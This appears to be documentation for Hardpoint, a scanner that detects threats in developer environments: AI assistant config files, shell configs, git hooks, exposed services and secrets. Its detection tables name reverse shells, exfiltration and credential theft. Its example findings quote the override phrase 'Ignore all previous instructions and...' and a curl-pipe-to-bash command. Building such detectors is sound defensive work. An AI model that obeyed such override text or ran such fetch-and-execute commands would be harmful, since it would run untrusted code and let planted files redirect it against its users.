Skip to main content

Scanners

Hardpoint includes five specialized scanners, each targeting a specific attack surface in developer environments.

AI Configuration Scanner

Detects threats in AI coding assistant configuration files.

Files Scanned

  • .cursorrules, .cursor/rules/*.mdc
  • mcp.json, .mcp.json
  • CLAUDE.md, AGENTS.md
  • .github/copilot-instructions.md

Detections

IDNameSeverity
AI-001Instruction OverrideCritical
AI-002Hidden UnicodeHigh
AI-003Role ConfusionHigh
AI-004Data ExfiltrationCritical
AI-005MCP Server InjectionCritical

Example Finding

CRITICAL  AI-001: Instruction Override Detected
          File: .cursorrules:15
          "Ignore all previous instructions and..."

Shell Configuration Scanner

Finds backdoors and malicious patterns in shell configs.

Files Scanned

  • .bashrc, .bash_profile, .bash_aliases
  • .zshrc, .zprofile, .zsh_aliases
  • .profile

Detections

IDNameSeverity
SHELL-001Reverse ShellCritical
SHELL-002Curl Pipe to ShellHigh
SHELL-003Encoded CommandHigh
SHELL-004PATH PoisoningMedium
SHELL-005Alias HijackingMedium

Example Finding

HIGH      SHELL-002: Curl Pipe to Shell
          File: .bashrc:42
          curl https://example.com/script | bash

Git Security Scanner

Checks git hooks and configuration integrity.

Files Scanned

  • .git/hooks/*
  • .git/config
  • .gitconfig

Detections

IDNameSeverity
GIT-001Malicious HookCritical
GIT-002Hook ExfiltrationHigh
GIT-003Credential TheftCritical

Example Finding

CRITICAL  GIT-001: Malicious Git Hook
          File: .git/hooks/pre-commit
          Hook executes suspicious command

Network Exposure Scanner

Identifies services exposed beyond localhost.

Services Checked

  • AI services: Ollama (11434), LM Studio (1234)
  • Databases: PostgreSQL (5432), MongoDB (27017), Redis (6379)
  • Development: Vite (5173), webpack-dev-server (8080)

Detections

IDNameSeverity
NET-001Service ExposedHigh
NET-002Database ExposedCritical

Example Finding

CRITICAL  NET-002: Database Exposed to Network
          Service: PostgreSQL on 0.0.0.0:5432
          Should bind to 127.0.0.1 instead

Secrets Scanner

Finds hardcoded credentials using patterns and entropy analysis.

Files Scanned

  • .env, .env.*
  • Shell configurations
  • AWS credentials (~/.aws/credentials)
  • Configuration files

Detections

IDNameSeverity
SECRET-001AWS Access KeyCritical
SECRET-002GitHub TokenHigh
SECRET-003Private KeyCritical
SECRET-004API KeyHigh
SECRET-ENTROPYHigh-Entropy StringMedium

Example Finding

CRITICAL  SECRET-001: AWS Access Key Detected
          File: .env:5
          AKIAIOSFODNN7EXAMPLE

Running Specific Scanners

# Run single scanner
hardpoint scan ai

# Run multiple scanners
hardpoint scan ai shell secrets

# Run all scanners (default)
hardpoint scan